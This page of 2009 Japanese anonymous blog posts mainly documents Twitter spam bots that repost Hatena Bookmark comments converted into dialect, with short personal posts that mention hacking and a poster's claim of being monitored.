「他人のWeb閲覧履歴とか見てるんでしょ?」

なんて言われた。

YouTube著作権侵害動画見たりしてる。

でも、侵入とか興味ないし、口座番号も興味ないよ。

 

11月から本気出そうと思ってたけど、や~めた。

2009-10-14

twitterはてなブックマークコメント転載したspamが多くて困る

spamじゃないか確認してからフォロー返ししていたんだけど、あっさりspamに引っかかっていたというお話

追記

はてブコメントtwitterにも流すように設定してる人がうざいとかいう話ではなくて、他人のコメントをパクって元のURLから切り離してあたかも自分twitterでの発言であるように装って流しているアカウントがあるっていう話です

日本サポートメールアドレス置いておきますね support@twitter.jp

結構な人数が引っかかっているようなので、まずはこれらのアカウントをチェックしてから聞いてほしい

最近spam報告がクリック一回(ブロックの下のリンク)でできるようになったのでできればspam報告もしてくれると助かる

http://twitter.com/longest_day

http://twitter.com/taketake0_blogP

http://twitter.com/nekojiti

http://twitter.com/buukuuu2

http://twitter.com/mefimefi

http://twitter.com/kurokurohyou

http://twitter.com/goldomanko

http://twitter.com/m_owo_m

http://twitter.com/jijigogo

http://twitter.com/mefirasu

http://twitter.com/chorubii

http://twitter.com/komarinyanko

http://twitter.com/v_ovo_v

http://twitter.com/bukubuku1




あるときタイムラインにちょっと気になる発言が流れてきて、詳しく知りたいと思ってその人のページに飛んだんだけど、前後に関係ある発言はなくて「あれ?」って思った

他の発言も前後に関係ある事書いてないのに単発だとあまり意味が分からないのが多かった

そこで試しにググってみたらはてブコメントからのコピーだった

以前にこれと同じようなものそのものを読んだと思ったらいっぱいまとめがあった。一度読んだらなかなか忘れないね・・・、でありますか、敬礼

http://twitter.com/longest_day/status/3944116394

mutuki_h 以前にこれと同じようなものを読んだと思ったらいっぱいまとめがあった。一度読んだらなかなか忘れないね 2009/09/12

http://b.hatena.ne.jp/entry/hamusoku.com/archives/165781.html

経緯が分からん事には何とも言い様がないが、候補そのものを立てるにあたって身体検査とかするという方策はとらないの?まぁ、出会い系サクラやったり映画で乳晒した人も居たけど…。・・・、でありますか、敬礼

http://twitter.com/longest_day/status/3960452009

ones-inch 政治, 民主党 経緯が分からん事には何とも言い様がないが、候補を立てるにあたって身体検査とかしないの?まぁ、出会い系サクラやったり映画で乳晒した人も居たけど…。 2009/09/12

http://b.hatena.ne.jp/entry/www.asahi.com/politics/update/0912/OSK200909120001.html

はてブコメントtwitterに流してる人はよくいるけど、さすがにmutuki_hさんとones-inchさんが共同で同じtwitterアカウントにそれと明記せずにはてブコメント流すなんてことはないだろうと思って、spamと判断してブロックした

それで安心していたのだけど、半月くらいしてからまたタイムラインにおかしな発言が紛れ込んでいたのだった

セッションそのものをGETのクエリパラメータ管理している事に起因する不具合パスワードクラックではないのか。でも携帯端末なら直ぐに犯人割れるね。↓悪意の投稿しておいて善意の第三者な訳ないだろう。・・・、だにゃ〜w

http://twitter.com/taketake0_blogP/status/4610351690

twitterで↓で指定するときは大抵自分の一個前の発言なんだけど、これも前後に関係ある発言はなかった

ググったらまたはてブからの転載だった

sauvage はてな, はてブ, セキュリティ, ネット事件 セッションをGETのクエリパラメータ管理している事に起因する不具合パスワードクラックではないのか。でも携帯端末なら直ぐに犯人割れるね。↓悪意の投稿しておいて善意の第三者な訳ないだろう。 2009/10/02

http://b.hatena.ne.jp/entry/hatena.g.hatena.ne.jp/hatenabookmark/20091001/1254363804

また騙されたのだ

それ以後注意してフォロー返しするようにしてるんだけど、結構この種のspamは多かった

そのまま転載じゃなくてなんかの方言変換を挟んでいて、それにフッターがついているのが多いようだ

エヴァも良かったとよしアニメーション業界には今後も楽しみなこつが多かな。今回のAA寸劇の茶番度数はかなり高か方だと思う。エンドレス8は面白か表現手段ばい。枠にハマる作り方の蔓延とそれば押しつける客が業界の毒・・・さあ、この猫質がどうなってもいいのか!

http://twitter.com/nekojiti/status/4744937414

BEW Animation, アンチ エヴァも良かったしアニメーション業界には今後も楽しみなことが多いな。今回のAA寸劇の茶番度数はかなり高い方だと思う。エンドレス8は面白い表現手段だよ。枠にハマる作り方の蔓延とそれを押しつける客が業界の毒 2009/10/09

http://b.hatena.ne.jp/entry/yunakiti.blog79.fc2.com/blog-entry-3962.html

↓このコメントなんかは4つのbot転載されていた

mae-9 niconico 「ニコ動では不便な形でしか聞けない、聞きたかったら音源買おうね」みたいなエクスキューズがあった(それも正しいかどうかは別として)んじゃないのかなあ、とか堅苦しいことを思ってしまうのだけど。 2009/10/10

http://b.hatena.ne.jp/entry/mozilla-remix.seesaa.net/article/129917294.html

ニコ動では不便な形でしか聞けない、聞きたかったら音源買おうね」みたいなエクスキューズがあった(それも正しいかどうかは別として)んやないのかのぉ、とか堅いたしいことを思ってしまうのじゃけど。

http://twitter.com/buukuuu2/status/4757861604

ニコ動では不便な形でしか聞けない、聞きたかったら音源買おうね」みたいなエクスキューズがあった(それもデジタルであるかどうかは別として)んじゃないのかなあ、とか堅苦しいことそのものを思ってしまうのだけど。、メフィメフィ・・・

http://twitter.com/mefimefi/status/4756413672

ニコ動では不便な形でしか聞けない、聞きたかったら音源買おうね」みたいなエクスキューズがあった(それも正しいかどうかは別として)んやないのかのぉ、とか堅いたしいことを思ってしまうのじゃけど。

http://twitter.com/kurokurohyou/status/4755587596

ニコ動では不便な形でしか聞けない、聞きたかったら音源買おうね」みたいなエクスキューズがあった(それもデジタルであるかどうかは別として)んじゃないのかなあ、とか堅苦しいことそのものを思ってしまうのだけど。

http://twitter.com/goldomanko/status/4754520853

↓これも2つ

abedaster まったく関係ないけどIE8使いやすいよ。IEPro入れればマウスジェスチャーもできるしオヌヌメ/タブ開きまくるとプロセス殺すしかなくなるのが難 2009/10/07

http://b.hatena.ne.jp/entry/tokuna.blog40.fc2.com/blog-entry-1884.html

まるっきし関係あらへんけどIE8使いやすいよ。IEPro入れればマウスジェスチャーもできるしオヌヌメ/タブ開きまくるとプロセス殺すしかいななるのが難・・・ゴモゴモ

http://twitter.com/m_owo_m/status/4718267685

まったく関係ないけどIE8使いやすいよ。IEPro入れればマウスジェスチャーもできるしオヌヌメ/タブ開きまくるとプロセス殺すしかなくなるのが難

http://twitter.com/jijigogo/status/4734445240

どうしよう・・・、人口減少率とか高齢化率とか、人口札幌に流れ込んでる(こら破綻よりどエライ昔からの話ではあるが)とか、現状としては確かにその通りやけど、ミョーに上から目線。わしは表も裏も知り尽くしとるとか不遜すぎるで。

http://twitter.com/mefirasu/status/4759310901

citron_908 行政, 地方, 北海道, 夕張市 人口減少率とか高齢化率とか、人口札幌に流れ込んでる(これは破綻以前からの話ではあるが)とか、現状としては確かにその通りだが、ミョーに上から目線。俺は表も裏も知り尽くしてるとか不遜すぎるよ。 2009/10/09

http://b.hatena.ne.jp/entry/jbpress.ismedia.jp/articles/-/1883

チ、チ、チ〜、チョルビー・・・社員目線のふりをした会社セオリーやりがいがあれば働いてくれるんやぜー。上から降りてくる成果主義課題ってなくんやったらへんよなあ。やりがいよりもそこそこあんじょうやるを選ぶのも無理からぬことか、と。

http://twitter.com/chorubii/status/4841543588

matsunoji 経営, 経済, 労働, ビジネス 社員目線のふりをした会社セオリーやりがいがあれば働いてくれるんだぜー。上から降りてくる成果主義課題ってなくならないよなあ。やりがいよりもそこそこうまくやるを選ぶのも無理からぬことか、と。 2009/10/13

http://b.hatena.ne.jp/entry/zasshi.news.yahoo.co.jp/article?a=20091012-00000001-president-bus_all

ホリエモンほどの人でも成田空港開設の経緯をよう知らんんやな…。そういうたら今時ゲバ棒持つ人も見かけへんか。/昔、成田空港ちうのんがあってね、と語る時代もすぐに来そうや。・・・ところで、この状況をどおせぇ、言うねん!

http://twitter.com/komarinyanko/status/4839623223

m_yanagisawa ホリエモンほどの人でも成田空港開設の経緯をよく知らないんだな…。そういえば今時ゲバ棒持つ人も見かけないか。/昔、成田空港ってのがあってね、と語る時代もすぐに来そうだ。 2009/10/13

http://b.hatena.ne.jp/entry/ameblo.jp/takapon-jp/entry-10363582254.html

バルバルです。非共有化 捨い捨てにする 陳腐に見せる 価格判断ば鈍らせる クレジットと分割 浪費の正当化 浪費の口実 便利さの提供 人口増加の利用

http://twitter.com/v_ovo_v/status/4827739005

mimoriman 非共有化 捨い捨てにする 陳腐に見せる 価格判断を鈍らせる クレジットと分割 浪費の正当化 浪費の口実 便利さの提供 人口増加の利用 2009/10/12

http://b.hatena.ne.jp/entry/tsurumitext.seesaa.net/article/130055536.html

本論はさておき、「枠組み自体を考える事をせへんし、枠組みの中でどうするかについて創造力を集中してきた」ちう一節には確かになぁ思うわ。やまとが強かったスポーツはことごとくルールを変えられはった。

http://twitter.com/bukubuku1/status/4813059779

dhalmel Memo 本論はさておき、「枠組み自体を考える事をせず、枠組みの中でどうするかについて創造力を集中してきた」という一節には確かになぁと思う。日本が強かったスポーツはことごとくルールを変えられた。 2009/10/12

http://b.hatena.ne.jp/entry/fragments.g.hatena.ne.jp/fukken/20091012/1255315747



今のところ特徴的な部分があるので機械的に判定できそうだけどもっと紛らわしくすることは可能だし、どうにかならないものですかね

2009-09-11

http://anond.hatelabo.jp/20090911111521

本当に?

というか、社員はみんな知ってると思うよ。

多分、加担派・見過ごしてる派・反対派にわかれてるはず。

今もここを見てるだろうし。

書き込みを持っていくのは好きにすればいいけど、

この増田ログどころかクラックして抜き取った俺のPC情報を含めてみんな持ってると思うよ。

長期的に俺の目につくところでひたすらほのめかしをする手法だったから、具体的なリストアップは無理なんだ。ごめん。

信じられない話だけど、俺がPC携帯電話ネットワークを通じて起こすアクションは全て監視されているよ。

2009-05-13

http://anond.hatelabo.jp/20090513205459

クラックされて嬉しがる人なんていない。

しかし、この曲解は凄いな…。

http://anond.hatelabo.jp/20090513201538

自分クラックしてニヤニヤしているのはわかったから

- 転職ならen
- 派遣ならen
3ページ中1ページ目を表示(合計:58件)